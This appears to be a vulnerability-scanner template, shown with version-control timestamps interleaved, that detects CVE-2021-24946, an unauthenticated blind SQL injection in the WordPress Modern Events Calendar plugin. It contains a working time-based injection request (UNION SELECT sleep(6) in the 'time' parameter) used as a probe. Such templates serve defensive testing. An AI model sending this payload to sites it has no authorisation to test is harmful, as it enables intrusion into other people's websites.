2023-01-02 13:01:31 +00:00
id : CVE-2021-24946
info :
2023-01-16 17:41:15 +00:00
name : WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection
2023-01-02 13:01:31 +00:00
author : theamanrawat
severity : critical
description : |
2023-01-16 17:41:15 +00:00
WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability.
2023-01-02 13:01:31 +00:00
reference :
- https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445
- https://wordpress.org/plugins/modern-events-calendar-lite/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24946
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html
2023-01-02 13:01:31 +00:00
classification :
2023-01-05 11:21:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-01-02 13:01:31 +00:00
cve-id : CVE-2021-24946
2023-01-05 11:21:19 +00:00
cwe-id : CWE-89
2023-08-31 11:46:18 +00:00
epss-score : 0.05911
epss-percentile : 0.92472
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
2023-01-02 13:01:31 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : webnus
product : modern_events_calendar_lite
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-04-12 10:55:48 +00:00
tags : cve2021,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,cve,modern-events-calendar-lite,wordpress
2023-01-02 13:01:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-01-02 13:01:31 +00:00
- raw :
- |
@timeout : 10s
GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'duration>=6'
2023-01-03 11:35:04 +00:00
- 'status_code == 200 || status_code == 500'
2023-01-02 13:01:31 +00:00
- 'contains(content_type, "text/html")'
2023-01-03 11:35:04 +00:00
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
condition : and